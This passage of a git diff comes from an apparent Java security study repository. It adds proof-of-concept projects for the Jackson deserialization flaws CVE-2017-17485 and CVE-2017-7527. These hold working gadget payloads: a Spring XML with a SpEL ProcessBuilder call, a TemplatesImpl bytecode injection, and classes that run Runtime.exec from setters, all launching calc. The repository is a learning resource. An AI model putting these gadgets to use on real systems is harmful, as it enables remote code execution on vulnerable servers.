cala-lang.org/api/2.13.8/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-sources.jar"],[{"name":"scala-library","type":"doc","extension":"jar","classifier":"javadoc","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-javadoc.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-javadoc.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]}],"details":[]}],"stats":{"resolveTime":-1,"downloadTime":-1,"downloadSize":-1,"cached":false},"stamps":{}}
\ No newline at end of file
diff --git a/JavaSecurity/JDK/Scala1/target/streams/compile/externalDependencyClasspath/_global/streams/export b/JavaSecurity/JDK/Scala1/target/streams/compile/externalDependencyClasspath/_global/streams/export
new file mode 100644
index 00000000..6211971d
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/target/streams/compile/externalDependencyClasspath/_global/streams/export
@@ -0,0 +1 @@
+/Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8.jar
diff --git a/JavaSecurity/JDK/Scala1/target/streams/compile/managedClasspath/_global/streams/export b/JavaSecurity/JDK/Scala1/target/streams/compile/managedClasspath/_global/streams/export
new file mode 100644
index 00000000..6211971d
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/target/streams/compile/managedClasspath/_global/streams/export
@@ -0,0 +1 @@
+/Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8.jar
diff --git a/JavaSecurity/JDK/Scala1/target/streams/compile/scalacOptions/_global/streams/out b/JavaSecurity/JDK/Scala1/target/streams/compile/scalacOptions/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/target/streams/compile/unmanagedClasspath/_global/streams/export b/JavaSecurity/JDK/Scala1/target/streams/compile/unmanagedClasspath/_global/streams/export
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/target/streams/compile/unmanagedClasspath/_global/streams/export
@@ -0,0 +1 @@
+
diff --git a/JavaSecurity/JDK/Scala1/target/streams/compile/unmanagedClasspath/_global/streams/out b/JavaSecurity/JDK/Scala1/target/streams/compile/unmanagedClasspath/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/target/streams/compile/unmanagedJars/_global/streams/export b/JavaSecurity/JDK/Scala1/target/streams/compile/unmanagedJars/_global/streams/export
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/target/streams/compile/unmanagedJars/_global/streams/export
@@ -0,0 +1 @@
+
diff --git a/JavaSecurity/JDK/Scala1/target/streams/runtime/externalDependencyClasspath/_global/streams/export b/JavaSecurity/JDK/Scala1/target/streams/runtime/externalDependencyClasspath/_global/streams/export
new file mode 100644
index 00000000..6211971d
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/target/streams/runtime/externalDependencyClasspath/_global/streams/export
@@ -0,0 +1 @@
+/Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8.jar
diff --git a/JavaSecurity/JDK/Scala1/target/streams/runtime/managedClasspath/_global/streams/export b/JavaSecurity/JDK/Scala1/target/streams/runtime/managedClasspath/_global/streams/export
new file mode 100644
index 00000000..6211971d
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/target/streams/runtime/managedClasspath/_global/streams/export
@@ -0,0 +1 @@
+/Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8.jar
diff --git a/JavaSecurity/JDK/Scala1/target/streams/runtime/unmanagedClasspath/_global/streams/export b/JavaSecurity/JDK/Scala1/target/streams/runtime/unmanagedClasspath/_global/streams/export
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/target/streams/runtime/unmanagedClasspath/_global/streams/export
@@ -0,0 +1 @@
+
diff --git a/JavaSecurity/JDK/Scala1/target/streams/runtime/unmanagedClasspath/_global/streams/out b/JavaSecurity/JDK/Scala1/target/streams/runtime/unmanagedClasspath/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/target/streams/runtime/unmanagedJars/_global/streams/export b/JavaSecurity/JDK/Scala1/target/streams/runtime/unmanagedJars/_global/streams/export
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/target/streams/runtime/unmanagedJars/_global/streams/export
@@ -0,0 +1 @@
+
diff --git a/JavaSecurity/JDK/Scala1/target/streams/test/externalDependencyClasspath/_global/streams/export b/JavaSecurity/JDK/Scala1/target/streams/test/externalDependencyClasspath/_global/streams/export
new file mode 100644
index 00000000..6211971d
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/target/streams/test/externalDependencyClasspath/_global/streams/export
@@ -0,0 +1 @@
+/Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8.jar
diff --git a/JavaSecurity/JDK/Scala1/target/streams/test/managedClasspath/_global/streams/export b/JavaSecurity/JDK/Scala1/target/streams/test/managedClasspath/_global/streams/export
new file mode 100644
index 00000000..6211971d
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/target/streams/test/managedClasspath/_global/streams/export
@@ -0,0 +1 @@
+/Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8.jar
diff --git a/JavaSecurity/JDK/Scala1/target/streams/test/unmanagedClasspath/_global/streams/export b/JavaSecurity/JDK/Scala1/target/streams/test/unmanagedClasspath/_global/streams/export
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/target/streams/test/unmanagedClasspath/_global/streams/export
@@ -0,0 +1 @@
+
diff --git a/JavaSecurity/JDK/Scala1/target/streams/test/unmanagedClasspath/_global/streams/out b/JavaSecurity/JDK/Scala1/target/streams/test/unmanagedClasspath/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/target/streams/test/unmanagedJars/_global/streams/export b/JavaSecurity/JDK/Scala1/target/streams/test/unmanagedJars/_global/streams/export
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/target/streams/test/unmanagedJars/_global/streams/export
@@ -0,0 +1 @@
+
diff --git a/JavaSecurity/Jackson/CVE-2017-17485/.gitignore b/JavaSecurity/Jackson/CVE-2017-17485/.gitignore
new file mode 100644
index 00000000..5ff6309b
--- /dev/null
+++ b/JavaSecurity/Jackson/CVE-2017-17485/.gitignore
@@ -0,0 +1,38 @@
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### IntelliJ IDEA ###
+.idea/modules.xml
+.idea/jarRepositories.xml
+.idea/compiler.xml
+.idea/libraries/
+*.iws
+*.iml
+*.ipr
+
+### Eclipse ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
+
+### Mac OS ###
+.DS_Store
\ No newline at end of file
diff --git a/JavaSecurity/Jackson/CVE-2017-17485/pom.xml b/JavaSecurity/Jackson/CVE-2017-17485/pom.xml
new file mode 100644
index 00000000..3de5eb1b
--- /dev/null
+++ b/JavaSecurity/Jackson/CVE-2017-17485/pom.xml
@@ -0,0 +1,53 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>org.example</groupid>
+ <artifactid>CVE-2017-17485</artifactid>
+ <version>1.0-SNAPSHOT</version>
+ <name>Archetype - CVE-2017-17485</name>
+ <url>http://maven.apache.org</url>
+ <dependencies>
+ <dependency>
+ <groupid>com.fasterxml.jackson.core</groupid>
+ <artifactid>jackson-databind</artifactid>
+ <version>2.7.9.2</version>
+ </dependency>
+ <dependency>
+ <groupid>com.fasterxml.jackson.core</groupid>
+ <artifactid>jackson-core</artifactid>
+ <version>2.7.9</version>
+ </dependency>
+ <dependency>
+ <groupid>com.fasterxml.jackson.core</groupid>
+ <artifactid>jackson-annotations</artifactid>
+ <version>2.7.9</version>
+ </dependency>
+ <dependency>
+ <groupid>org.springframework</groupid>
+ <artifactid>spring-context</artifactid>
+ <version>5.0.2.RELEASE</version>
+ </dependency>
+ <dependency>
+ <groupid>org.springframework</groupid>
+ <artifactid>spring-beans</artifactid>
+ <version>5.0.2.RELEASE</version>
+ </dependency>
+ <dependency>
+ <groupid>org.springframework</groupid>
+ <artifactid>spring-core</artifactid>
+ <version>5.0.2.RELEASE</version>
+ </dependency>
+ <dependency>
+ <groupid>org.springframework</groupid>
+ <artifactid>spring-expression</artifactid>
+ <version>5.0.2.RELEASE</version>
+ </dependency>
+ <dependency>
+ <groupid>commons-logging</groupid>
+ <artifactid>commons-logging</artifactid>
+ <version>1.2</version>
+ </dependency>
+
+
+ </dependencies>
+</project>
diff --git a/JavaSecurity/Jackson/CVE-2017-17485/spel.xml b/JavaSecurity/Jackson/CVE-2017-17485/spel.xml
new file mode 100644
index 00000000..5a086505
--- /dev/null
+++ b/JavaSecurity/Jackson/CVE-2017-17485/spel.xml
@@ -0,0 +1,9 @@
+<beans xmlns="http://www.springframework.org/schema/beans" + xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation=" + http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
+ <bean id="pb">
+ <constructor-arg value="calc" />
+ <property name="whatever" value="#{ pb.start() }"/>
+ </bean>
+</beans>
\ No newline at end of file
diff --git a/JavaSecurity/Jackson/CVE-2017-17485/src/main/java/com/drunkbaby/PoC.java b/JavaSecurity/Jackson/CVE-2017-17485/src/main/java/com/drunkbaby/PoC.java
new file mode 100644
index 00000000..1f4169e6
--- /dev/null
+++ b/JavaSecurity/Jackson/CVE-2017-17485/src/main/java/com/drunkbaby/PoC.java
@@ -0,0 +1,19 @@
+package com.drunkbaby;
+
+import com.fasterxml.jackson.databind.ObjectMapper;
+
+import java.io.IOException;
+
+public class PoC {
+ public static void main(String[] args) {
+ //CVE-2017-17485
+ String payload = "[\"org.springframework.context.support.ClassPathXmlApplicationContext\", \"http://127.0.0.1:8888/spel.xml\"]";
+ ObjectMapper mapper = new ObjectMapper();
+ mapper.enableDefaultTyping();
+ try {
+ mapper.readValue(payload, Object.class);
+ } catch (IOException e) {
+ e.printStackTrace();
+ }
+ }
+}
diff --git a/JavaSecurity/Jackson/CVE-2017-17485/src/main/resources/META-INF/maven/archetype.xml b/JavaSecurity/Jackson/CVE-2017-17485/src/main/resources/META-INF/maven/archetype.xml
new file mode 100644
index 00000000..346e4393
--- /dev/null
+++ b/JavaSecurity/Jackson/CVE-2017-17485/src/main/resources/META-INF/maven/archetype.xml
@@ -0,0 +1,9 @@
+<archetype>
+ <id>CVE-2017-17485</id>
+ <sources>
+ <source>src/main/java/App.java</source>
+ </sources>
+ <testsources>
+ <source>src/test/java/AppTest.java</source>
+ </testsources>
+</archetype>
diff --git a/JavaSecurity/Jackson/CVE-2017-17485/src/main/resources/archetype-resources/pom.xml b/JavaSecurity/Jackson/CVE-2017-17485/src/main/resources/archetype-resources/pom.xml
new file mode 100644
index 00000000..8977217d
--- /dev/null
+++ b/JavaSecurity/Jackson/CVE-2017-17485/src/main/resources/archetype-resources/pom.xml
@@ -0,0 +1,15 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>$org.example</groupid>
+ <artifactid>$CVE-2017-17485</artifactid>
+ <version>1ドル.0-SNAPSHOT</version>
+ <dependencies>
+ <dependency>
+ <groupid>junit</groupid>
+ <artifactid>junit</artifactid>
+ <version>3.8.1</version>
+ <scope>test</scope>
+ </dependency>
+ </dependencies>
+</project>
diff --git a/JavaSecurity/Jackson/CVE-2017-17485/src/main/resources/archetype-resources/src/main/java/App.java b/JavaSecurity/Jackson/CVE-2017-17485/src/main/resources/archetype-resources/src/main/java/App.java
new file mode 100644
index 00000000..1fa6a956
--- /dev/null
+++ b/JavaSecurity/Jackson/CVE-2017-17485/src/main/resources/archetype-resources/src/main/java/App.java
@@ -0,0 +1,13 @@
+package $org.example;
+
+/**
+ * Hello world!
+ *
+ */
+public class App 
+{
+ public static void main( String[] args )
+ {
+ System.out.println( "Hello World!" );
+ }
+}
diff --git a/JavaSecurity/Jackson/CVE-2017-17485/src/main/resources/archetype-resources/src/test/java/AppTest.java b/JavaSecurity/Jackson/CVE-2017-17485/src/main/resources/archetype-resources/src/test/java/AppTest.java
new file mode 100644
index 00000000..65be417e
--- /dev/null
+++ b/JavaSecurity/Jackson/CVE-2017-17485/src/main/resources/archetype-resources/src/test/java/AppTest.java
@@ -0,0 +1,38 @@
+package $org.example;
+
+import junit.framework.Test;
+import junit.framework.TestCase;
+import junit.framework.TestSuite;
+
+/**
+ * Unit test for simple App.
+ */
+public class AppTest 
+ extends TestCase
+{
+ /**
+ * Create the test case
+ *
+ * @param testName name of the test case
+ */
+ public AppTest( String testName )
+ {
+ super( testName );
+ }
+
+ /**
+ * @return the suite of tests being tested
+ */
+ public static Test suite()
+ {
+ return new TestSuite( AppTest.class );
+ }
+
+ /**
+ * Rigourous Test :-)
+ */
+ public void testApp()
+ {
+ assertTrue( true );
+ }
+}
diff --git a/JavaSecurity/Jackson/CVE-2017-7527/.gitignore b/JavaSecurity/Jackson/CVE-2017-7527/.gitignore
new file mode 100644
index 00000000..5ff6309b
--- /dev/null
+++ b/JavaSecurity/Jackson/CVE-2017-7527/.gitignore
@@ -0,0 +1,38 @@
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### IntelliJ IDEA ###
+.idea/modules.xml
+.idea/jarRepositories.xml
+.idea/compiler.xml
+.idea/libraries/
+*.iws
+*.iml
+*.ipr
+
+### Eclipse ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
+
+### Mac OS ###
+.DS_Store
\ No newline at end of file
diff --git a/JavaSecurity/Jackson/CVE-2017-7527/pom.xml b/JavaSecurity/Jackson/CVE-2017-7527/pom.xml
new file mode 100644
index 00000000..50af1c72
--- /dev/null
+++ b/JavaSecurity/Jackson/CVE-2017-7527/pom.xml
@@ -0,0 +1,42 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>org.example</groupid>
+ <artifactid>CVE-2017-7527</artifactid>
+ <version>1.0-SNAPSHOT</version>
+ <name>Archetype - CVE-2017-7527</name>
+ <url>http://maven.apache.org</url>
+ <dependencies>
+ <dependency>
+ <groupid>com.fasterxml.jackson.core</groupid>
+ <artifactid>jackson-databind</artifactid>
+ <version>2.7.9</version>
+ </dependency>
+ <dependency>
+ <groupid>com.fasterxml.jackson.core</groupid>
+ <artifactid>jackson-core</artifactid>
+ <version>2.7.9</version>
+ </dependency>
+ <dependency>
+ <groupid>com.fasterxml.jackson.core</groupid>
+ <artifactid>jackson-annotations</artifactid>
+ <version>2.7.9</version>
+ </dependency>
+
+ </dependencies>
+ <build>
+ <plugins>
+ 
+ <plugin>
+ <groupid>org.apache.maven.plugins</groupid>
+ <artifactid>maven-compiler-plugin</artifactid>
+ <version>3.6.1</version>
+ <configuration>
+ <source>1.7</source>
+ <target>1.7</target>
+ <encoding>${file.encoding}</encoding>
+ </configuration>
+ </plugin>
+ </plugins>
+ </build>
+</project>
diff --git a/JavaSecurity/Jackson/CVE-2017-7527/src/main/java/com/drunkbaby/PoC.java b/JavaSecurity/Jackson/CVE-2017-7527/src/main/java/com/drunkbaby/PoC.java
new file mode 100644
index 00000000..4af97e02
--- /dev/null
+++ b/JavaSecurity/Jackson/CVE-2017-7527/src/main/java/com/drunkbaby/PoC.java
@@ -0,0 +1,44 @@
+package com.drunkbaby;
+
+import com.fasterxml.jackson.databind.ObjectMapper;
+
+import javax.xml.bind.DatatypeConverter;
+import java.io.FileInputStream;
+import java.io.*;
+
+public class PoC {
+ public static void main(String[] args) throws Exception {
+ String exp = readClassStr("E:\\evilClass\\SimpleCalc.class");
+ String jsonInput = aposToQuotes("{\"object\":['com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl',\n" +
+ "{\n" +
+ "'transletBytecodes':['"+exp+"'],\n" +
+ "'transletName':'drun1baby',\n" +
+ "'outputProperties':{}\n" +
+ "}\n" +
+ "]\n" +
+ "}");
+ System.out.printf(jsonInput);
+ ObjectMapper mapper = new ObjectMapper();
+ mapper.enableDefaultTyping();
+ Test test;
+ try {
+ test = mapper.readValue(jsonInput, Test.class);
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ }
+
+ public static String aposToQuotes(String json){
+ return json.replace("'","\"");
+ }
+
+ public static String readClassStr(String cls) throws Exception{
+
+ File file = new File(cls);
+ FileInputStream fileInputStream = new FileInputStream(file);
+ byte[] bytes = new byte[(int) file.length()];
+ fileInputStream.read(bytes);
+ String base64Encoded = DatatypeConverter.printBase64Binary(bytes);
+ return base64Encoded;
+ }
+}
diff --git a/JavaSecurity/Jackson/CVE-2017-7527/src/main/java/com/drunkbaby/SimpleCalc.java b/JavaSecurity/Jackson/CVE-2017-7527/src/main/java/com/drunkbaby/SimpleCalc.java
new file mode 100644
index 00000000..10d201cd
--- /dev/null
+++ b/JavaSecurity/Jackson/CVE-2017-7527/src/main/java/com/drunkbaby/SimpleCalc.java
@@ -0,0 +1,25 @@
+package com.drunkbaby;
+
+import com.sun.org.apache.xalan.internal.xsltc.DOM;
+import com.sun.org.apache.xalan.internal.xsltc.TransletException;
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
+import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
+
+public class SimpleCalc extends AbstractTranslet {
+ public SimpleCalc() throws Exception {
+ Runtime.getRuntime().exec("Calc");
+ }
+
+ @Override
+ public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
+
+ }
+
+ @Override
+ public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
+
+ }
+
+
+}
\ No newline at end of file
diff --git a/JavaSecurity/Jackson/CVE-2017-7527/src/main/java/com/drunkbaby/Test.java b/JavaSecurity/Jackson/CVE-2017-7527/src/main/java/com/drunkbaby/Test.java
new file mode 100644
index 00000000..b530f020
--- /dev/null
+++ b/JavaSecurity/Jackson/CVE-2017-7527/src/main/java/com/drunkbaby/Test.java
@@ -0,0 +1,5 @@
+package com.drunkbaby;
+
+public class Test {
+ public Object object;
+}
diff --git a/JavaSecurity/Jackson/CVE-2017-7527/src/main/resources/META-INF/maven/archetype.xml b/JavaSecurity/Jackson/CVE-2017-7527/src/main/resources/META-INF/maven/archetype.xml
new file mode 100644
index 00000000..78b96846
--- /dev/null
+++ b/JavaSecurity/Jackson/CVE-2017-7527/src/main/resources/META-INF/maven/archetype.xml
@@ -0,0 +1,9 @@
+<archetype>
+ <id>CVE-2017-7527</id>
+ <sources>
+ <source>src/main/java/App.java</source>
+ </sources>
+ <testsources>
+ <source>src/test/java/AppTest.java</source>
+ </testsources>
+</archetype>
diff --git a/JavaSecurity/Jackson/CVE-2017-7527/src/main/resources/archetype-resources/pom.xml b/JavaSecurity/Jackson/CVE-2017-7527/src/main/resources/archetype-resources/pom.xml
new file mode 100644
index 00000000..cda42d7c
--- /dev/null
+++ b/JavaSecurity/Jackson/CVE-2017-7527/src/main/resources/archetype-resources/pom.xml
@@ -0,0 +1,15 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>$org.example</groupid>
+ <artifactid>$CVE-2017-7527</artifactid>
+ <version>1ドル.0-SNAPSHOT</version>
+ <dependencies>
+ <dependency>
+ <groupid>junit</groupid>
+ <artifactid>junit</artifactid>
+ <version>3.8.1</version>
+ <scope>test</scope>
+ </dependency>
+ </dependencies>
+</project>
diff --git a/JavaSecurity/Jackson/CVE-2017-7527/src/main/resources/archetype-resources/src/main/java/App.java b/JavaSecurity/Jackson/CVE-2017-7527/src/main/resources/archetype-resources/src/main/java/App.java
new file mode 100644
index 00000000..1fa6a956
--- /dev/null
+++ b/JavaSecurity/Jackson/CVE-2017-7527/src/main/resources/archetype-resources/src/main/java/App.java
@@ -0,0 +1,13 @@
+package $org.example;
+
+/**
+ * Hello world!
+ *
+ */
+public class App 
+{
+ public static void main( String[] args )
+ {
+ System.out.println( "Hello World!" );
+ }
+}
diff --git a/JavaSecurity/Jackson/CVE-2017-7527/src/main/resources/archetype-resources/src/test/java/AppTest.java b/JavaSecurity/Jackson/CVE-2017-7527/src/main/resources/archetype-resources/src/test/java/AppTest.java
new file mode 100644
index 00000000..65be417e
--- /dev/null
+++ b/JavaSecurity/Jackson/CVE-2017-7527/src/main/resources/archetype-resources/src/test/java/AppTest.java
@@ -0,0 +1,38 @@
+package $org.example;
+
+import junit.framework.Test;
+import junit.framework.TestCase;
+import junit.framework.TestSuite;
+
+/**
+ * Unit test for simple App.
+ */
+public class AppTest 
+ extends TestCase
+{
+ /**
+ * Create the test case
+ *
+ * @param testName name of the test case
+ */
+ public AppTest( String testName )
+ {
+ super( testName );
+ }
+
+ /**
+ * @return the suite of tests being tested
+ */
+ public static Test suite()
+ {
+ return new TestSuite( AppTest.class );
+ }
+
+ /**
+ * Rigourous Test :-)
+ */
+ public void testApp()
+ {
+ assertTrue( true );
+ }
+}
diff --git a/JavaSecurity/Jackson/JacksonBasic/pom.xml b/JavaSecurity/Jackson/JacksonBasic/pom.xml
index f9938d39..962dfab5 100644
--- a/JavaSecurity/Jackson/JacksonBasic/pom.xml
+++ b/JavaSecurity/Jackson/JacksonBasic/pom.xml
@@ -24,4 +24,16 @@
 </dependency>
 
 </dependencies>
+ <build>
+ <plugins>
+ <plugin>
+ <groupid>org.apache.maven.plugins</groupid>
+ <artifactid>maven-compiler-plugin</artifactid>
+ <configuration>
+ <source>6</source>
+ <target>6</target>
+ </configuration>
+ </plugin>
+ </plugins>
+ </build>
 </project>
diff --git a/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/Hacker.java b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/Hacker.java
index 207aa75a..339cc040 100644
--- a/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/Hacker.java
+++ b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/Hacker.java
@@ -1,4 +1,5 @@
 package com.drunkbaby;
 
 public class Hacker {
+ public String skill = "hiphop";
 }
diff --git a/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/JacksonVul/DeserializationObjectRun.java b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/JacksonVul/DeserializationObjectRun.java
new file mode 100644
index 00000000..f2972108
--- /dev/null
+++ b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/JacksonVul/DeserializationObjectRun.java
@@ -0,0 +1,17 @@
+package com.drunkbaby.JacksonVul;
+
+import com.drunkbaby.Person4;
+import com.fasterxml.jackson.databind.ObjectMapper;
+
+public class DeserializationObjectRun {
+
+ public static void main(String[] args) throws Exception {
+ ObjectMapper mapper = new ObjectMapper();
+ mapper.enableDefaultTyping();
+
+ String json = "{\"age\":6,\"name\":\"drunkbaby\",\"object\":[\"com.drunkbaby.JacksonVul.Evil\",{\"cmd\":\"calc\"}]}";
+ Person4 p2 = mapper.readValue(json, Person4.class);
+ System.out.println(p2);
+
+ }
+}
diff --git a/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/JacksonVul/DeserializationRun.java b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/JacksonVul/DeserializationRun.java
new file mode 100644
index 00000000..ff937f9c
--- /dev/null
+++ b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/JacksonVul/DeserializationRun.java
@@ -0,0 +1,17 @@
+package com.drunkbaby.JacksonVul;
+
+import com.drunkbaby.Person3;
+import com.fasterxml.jackson.databind.ObjectMapper;
+
+// 反序列化代码
+public class DeserializationRun {
+ public static void main(String[] args) throws Exception {
+ ObjectMapper mapper = new ObjectMapper();
+ mapper.enableDefaultTyping();
+
+ String json = "{\"age\":6,\"name\":\"drunkbaby\",\"sex\":[\"com.drunkbaby.JacksonVul.EvilSex\",{\"sex\":1}]}";
+ Person3 p2 = mapper.readValue(json, Person3.class);
+ System.out.println(p2);
+
+ }
+}
diff --git a/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/JacksonVul/Evil.java b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/JacksonVul/Evil.java
new file mode 100644
index 00000000..836b7f1a
--- /dev/null
+++ b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/JacksonVul/Evil.java
@@ -0,0 +1,14 @@
+package com.drunkbaby.JacksonVul;
+
+public class Evil {
+ String cmd;
+
+ public void setCmd(String cmd) {
+ this.cmd = cmd;
+ try {
+ Runtime.getRuntime().exec(this.cmd);
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ }
+}
\ No newline at end of file
diff --git a/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/JacksonVul/EvilSex.java b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/JacksonVul/EvilSex.java
new file mode 100644
index 00000000..d94577fc
--- /dev/null
+++ b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/JacksonVul/EvilSex.java
@@ -0,0 +1,27 @@
+package com.drunkbaby.JacksonVul;
+
+import com.drunkbaby.defaultTyping.object_and_non_concrete.Sex;
+
+public class EvilSex implements Sex {
+ int sex;
+ public EvilSex() {
+ System.out.println("MySex构造函数");
+ }
+
+ @Override
+ public int getSex() {
+ System.out.println("MySex.getSex");
+ return sex;
+ }
+
+ @Override
+ public void setSex(int sex) {
+ System.out.println("MySex.setSex");
+ this.sex = sex;
+ try {
+ Runtime.getRuntime().exec("calc");
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ }
+}
\ No newline at end of file
diff --git a/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/JsonTypeInfo/JsonTypeInfo_Id/JsonTypeInfo_Id_Test.java b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/JsonTypeInfo/JsonTypeInfo_Id/JsonTypeInfo_Id_Test.java
new file mode 100644
index 00000000..718b6f42
--- /dev/null
+++ b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/JsonTypeInfo/JsonTypeInfo_Id/JsonTypeInfo_Id_Test.java
@@ -0,0 +1,21 @@
+package com.drunkbaby.JsonTypeInfo.JsonTypeInfo_Id;
+
+import com.drunkbaby.Hacker;
+import com.drunkbaby.Person2;
+import com.fasterxml.jackson.databind.ObjectMapper;
+
+public class JsonTypeInfo_Id_Test {
+ public static void main(String[] args) throws Exception {
+ Person2 p = new Person2();
+ p.age = 6;
+ p.name = "drunkbaby";
+ p.object = new Hacker();
+ ObjectMapper mapper = new ObjectMapper();
+
+ String json = mapper.writeValueAsString(p);
+ System.out.println(json);
+
+ Person2 p2 = mapper.readValue(json, Person2.class);
+ System.out.println(p2);
+ }
+}
\ No newline at end of file
diff --git a/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/Person.java b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/Person.java
index e1f883f6..2d3d7fdd 100644
--- a/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/Person.java
+++ b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/Person.java
